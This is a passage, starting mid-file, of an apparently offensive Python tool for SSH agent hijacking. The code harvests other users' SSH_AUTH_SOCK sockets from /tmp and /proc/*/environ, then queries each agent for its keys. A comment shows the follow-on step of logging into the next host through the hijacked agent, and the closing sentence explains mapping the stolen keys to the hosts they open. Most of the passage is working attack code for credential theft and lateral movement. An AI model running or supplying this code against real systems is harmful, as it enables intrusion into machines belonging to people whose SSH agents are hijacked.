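    if not payload or payload[0] != SSH_AGENT_IDENTITIES_ANSWER:
        raise ValueError(f"unexpected agent message type {payload[:1]!r}")
    (nkeys,) = struct.unpack_from(">I", payload, 1)
    off, keys = 5, []
    for _ in range(nkeys):
        blob, off = _read_string(payload, off)
        comment, off = _read_string(payload, off)
        keytype, _ = _read_string(blob, 0)          # first field of every public key blob
        keys.append({"type": keytype.decode(), "fingerprint": fingerprint(blob),
                     "comment": comment.decode(errors="replace")})
    return keys


def list_identities(sock_path: str) -> list:
    """Talk to the agent behind sock_path (the hijacked SSH_AUTH_SOCK)."""
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
        s.settimeout(5)
        s.connect(sock_path)
        s.sendall(build_request_identities())
        (length,) = struct.unpack(">I", s.recv(4))
        payload = b""
        while len(payload) < length:
            chunk = s.recv(length - len(payload))
            if not chunk:
                raise ConnectionError("agent closed the socket")
            payload += chunk
    return parse_identities_answer(payload)


def find_agent_sockets() -> list:
    """sshd's forwarding sockets plus the SSH_AUTH_SOCK of every readable process."""
    found = set(glob.glob("/tmp/ssh-*/agent.*"))
    for env in glob.glob("/proc/[0-9]*/environ"):
        try:
            with open(env, "rb") as fh:
                data = fh.read()
        except OSError:                               # not root and not our own process
            continue
        for var in data.split(b"\x00"):
            if var.startswith(b"SSH_AUTH_SOCK="):
                found.add(var.split(b"=", 1)[1].decode(errors="replace"))
    return sorted(found)


def constructed_answer() -> bytes:
    """A made-up SSH_AGENT_IDENTITIES_ANSWER with one ed25519 key, for offline use."""
    blob = _ssh_string(b"ssh-ed25519") + _ssh_string(b"\x11" * 32)   # not a real key
    return (bytes([SSH_AGENT_IDENTITIES_ANSWER]) + struct.pack(">I", 1)
            + _ssh_string(blob) + _ssh_string(b"alice@workstation"))


if __name__ == "__main__":
    for path in find_agent_sockets():
        try:
            keys = list_identities(path)
        except OSError as exc:
            print(path, "->", exc)
            continue
        for k in keys:
            print(f"{path}: {k['type']} {k['fingerprint']} {k['comment']}")
        # then: SSH_AUTH_SOCK=<path> ssh <user>@<next-host>
```

The fingerprints it prints are the same ones `ssh-add -l` shows, so they can be matched against authorized_keys files found elsewhere to work out which hosts each hijacked key opens.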
